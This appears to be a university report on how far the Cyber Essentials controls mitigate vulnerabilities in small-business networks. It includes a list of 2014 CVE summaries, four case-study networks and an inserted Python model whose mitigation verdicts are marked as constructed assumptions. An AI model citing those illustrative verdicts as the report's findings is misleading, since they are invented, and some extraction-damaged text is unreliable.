CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RPD routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
Methodology
The scheme of work for this report has been split into the following sections:
• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper models to be analysed.
• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can exploit commodity-level attacks.
• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.
Data Collection
In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.
Interviews
The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used: where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.
Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.
Survey
The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME (to gauge its size), the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.
Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster [9], and another publicly to closed groups of security-interested SME representatives.
Vulnerabilities
A total of 200 random vulnerabilities have been taken in equal numbers from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre.² Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.
In this report we use the Mitre organisation's definition of a vulnerability, which they state as:
An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).
(As shown on Mitre.org's Terminology page [6] in March '15)
² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security.
Figure 3: Methodology for Assessing Cyber Essentials
To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:
• allows an attacker to execute commands as another user;
• allows an attacker to access data that is contrary to the specified access restrictions for that data;
• allows an attacker to pose as another entity; or
• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed to determine to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.
Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated, or not mitigated. The results are double-vetted to ensure correctness.
For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.
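The applicability and mitigation rules just described, encoded as a small Python model. This is an added example, not code from the report: the CVE identifiers and vendors are taken from the report's list, but the patch/control/inherent flags, the mitigation verdicts and the SME inventory are constructed assumptions for illustration, not the report's own assessments.

```python
"""Added example (not part of the Security Lancaster report): an encoding of the
report's applicability and mitigation rules. Verdict flags and the SME inventory
below are constructed assumptions, not the report's assessments."""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable, Optional

MITIGATED = "mitigated"
PARTIAL = "partially mitigated"
NOT_MITIGATED = "not mitigated"

# The five Cyber Essentials control areas the report assesses against.
CE_CONTROLS = frozenset({"boundary firewalls", "secure configuration",
                         "access control", "malware protection", "patch management"})


@dataclass(frozen=True)
class Vulnerability:
    cve: str
    vendor: str
    product: str
    kind: str                      # "hardware" or "software"
    patch_available: bool          # vendor has shipped a security fix
    inherent: bool = False         # cannot be fixed by a patch or firmware update
    control: Optional[str] = None  # a CE control other than patching that removes exposure


@dataclass(frozen=True)
class SMENetwork:
    name: str
    hardware_vendors: frozenset  # vendors of deployed hardware (like-product rule)
    software_in_use: frozenset   # software in use or likely in use


def applicable(v: Vulnerability, net: SMENetwork) -> bool:
    """Report rule: hardware CVEs apply if the SME uses a like-product from the
    same vendor; software CVEs apply only if that software is (likely) in use."""
    if v.kind == "hardware":
        return v.vendor in net.hardware_vendors
    return v.product in net.software_in_use


def assess(v: Vulnerability) -> str:
    """Report rule: mitigated if a CE control removes the exposure or a vendor fix
    exists for patch management to apply; partially mitigated while the fix is
    still pending from a third party; not mitigated for inherent flaws."""
    if v.inherent:
        return NOT_MITIGATED
    if v.control is not None:
        if v.control not in CE_CONTROLS:
            raise ValueError(f"{v.cve}: unknown control {v.control!r}")
        return MITIGATED
    return MITIGATED if v.patch_available else PARTIAL


def tally(vulns: Iterable[Vulnerability], net: Optional[SMENetwork] = None) -> Counter:
    """Count verdicts. With net=None every CVE is assumed in use (the report's
    worst-case, fully inclusive assessment); otherwise only applicable CVEs count."""
    chosen = [v for v in vulns if net is None or applicable(v, net)]
    return Counter(assess(v) for v in chosen)


def percentages(counts: Counter) -> dict:
    """Share of each verdict, as plotted in the report's Figure 4."""
    total = sum(counts.values())
    return {k: round(100.0 * n / total, 1) for k, n in counts.items()} if total else {}


# Constructed sample: CVE ids and vendors come from the report's list; the
# patch/control/inherent flags are illustrative assumptions only.
SAMPLE_VULNS = [
    Vulnerability("CVE-2014-0354", "ZyXEL", "NBG-419N", "hardware",
                  patch_available=False, inherent=True),
    Vulnerability("CVE-2014-2109", "Cisco", "IOS", "hardware", patch_available=True),
    Vulnerability("CVE-2014-3872", "D-Link", "DAP-1350", "hardware",
                  patch_available=False, control="boundary firewalls"),
    Vulnerability("CVE-2014-0515", "Adobe", "Flash Player", "software",
                  patch_available=True),
    Vulnerability("CVE-2014-1466", "CSP", "MySQL User Manager", "software",
                  patch_available=False),
    Vulnerability("CVE-2014-9357", "Docker", "Docker", "software", patch_available=True),
]

# Constructed SME inventory (not one of the report's four case studies).
EXAMPLE_SME = SMENetwork("example SME", frozenset({"Cisco", "D-Link"}),
                         frozenset({"Flash Player", "Docker"}))

if __name__ == "__main__":
    print("worst case:", dict(tally(SAMPLE_VULNS)))
    print("example SME:", dict(tally(SAMPLE_VULNS, EXAMPLE_SME)))
    print("shares:", percentages(tally(SAMPLE_VULNS)))
```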
AnalysisT
he analysis of data collected has beensplit into sections firstly each of thevulnerabilities have been assessed to
ascertain their mitigation with and withoutthe use of the Cyber Essentials controlsthis supposes a case where any software orhardware source of a vulnerability is in use (iea worst-case fully inclusive assessment)
What follows is an analysis into theinformation gathered from interviews FourSMEs from distinct industries are detailed inphysical infrastructure and service usage aswell as current user access policies and existingsecurity measures in place A summary of themitigation results in vulnerabilities in softwareand hardware used for each SME networkconfiguration is included
The full table for the applicability of allCVE vulnerabilities to each of the networkstructures can be found in the CVE Detailssection on page 19
Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials security tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.
Figure 4: Percentage of Full Vulnerabilities List Mitigated
Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Whatever level of security tooling is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly to security breaches as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether more suitable and potentially more secure solutions are available.
The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.
Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.
For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.
Case Studies
Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.
• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.
• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.
• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.
• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.
Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.
Figure 5: SME-1 Network
The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.
As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.
Services: At the head office site a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.
Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, as well as having firewall rules in place to allow external access to the same system for off-site employees.
Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smartphones (technically this is not permitted by policy, but the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.
Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.
User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.
Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.
Figure 6: SME-1 Vulnerability Mitigation
Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it is placed in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, the SME ends up with several different browsers, with several versions of each, to cover all its requirements, exposing it multiple times to browser-based vectors.
Additionally, the heavy use of SSL-based communication places it in a position where any SSL vulnerabilities affect it too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25 staff based across multiple offices in one building.
Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators, via SSH.
Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.
Figure 7: SME-2 Network
Services: Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled.
Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.
User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server (database and file store) acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.
Figure 8: SME-2 Vulnerability Mitigation
The specialist SME had the fewest overall potential vulnerabilities, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.
Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.
Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.
Figure 9: SME-3 Network
Services: Employee devices sharing the network can use Windows folder sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.
All services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.
User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.
Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.
Figure 10: SME-3 Vulnerability Mitigation
The requirement for web development SMEs to operate across multiple web browsers on various versions, to test and build a customer's website, means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.
When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11: SME-4 Network
Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.
The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.
Services: No local servers are present to provide any service to employees or guests on the network.
File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.
All the services are accessed with SSL-secured connections (HTTPS mainly).
User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.
Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.
Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.
Figure 12: SME-4 Vulnerability Mitigation
Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, and so enables a wide variety of attack vectors through the web.
Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.
For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.
Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.
Services: Local - File, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file sharing are the most common services provided remotely.
